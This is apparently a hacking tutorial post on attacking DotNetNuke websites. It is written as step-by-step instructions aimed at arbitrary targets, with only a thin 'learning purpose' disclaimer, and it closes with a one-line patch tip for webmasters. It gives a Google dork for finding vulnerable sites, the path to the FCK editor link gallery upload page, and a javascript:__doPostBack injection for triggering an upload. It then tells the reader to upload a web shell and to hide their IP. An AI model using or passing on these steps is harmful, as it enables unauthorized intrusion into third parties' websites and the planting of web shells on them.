(DNN) Dot net nuke website hacking technique




Hello guys! so today i am posting about DNN or dot net nuke exploit. This also requires google to search for the vulnerable website.

1.Go to www.google.com



2.Enter this Dork
:inurl:/tabid/36/language/en-US/Default.aspx
3.The above dork will give you a large number of websites, vulnerable to attack, Lets take anyone of them which you feel good.

4.So, Lets assume we have found:
www.website.com/home/tabid/36/language/en-US/Default.aspx
5. Replace home/tabid/3/language/en-US/Default.aspx with this:
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
6. So it will become :  www.website.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

7. Hit enter. And you will find something like this:


8. Now in this case select the file, and inject the following java code in browser address bar:
javascript:__doPostBack('ctlURL$cmdUpload','')
9. Upload your shell thats it. Cheers,

Just go for it for learning purpose. Its illegal to Hack websites using this method. Be careful while doing such things Hide you ip. HT will not be responsible for any harm.

For Webmasters: If you are webmaster then check is your website vulnerable to attack if yes then kindly update your DOT NET NUKE then you will be safe.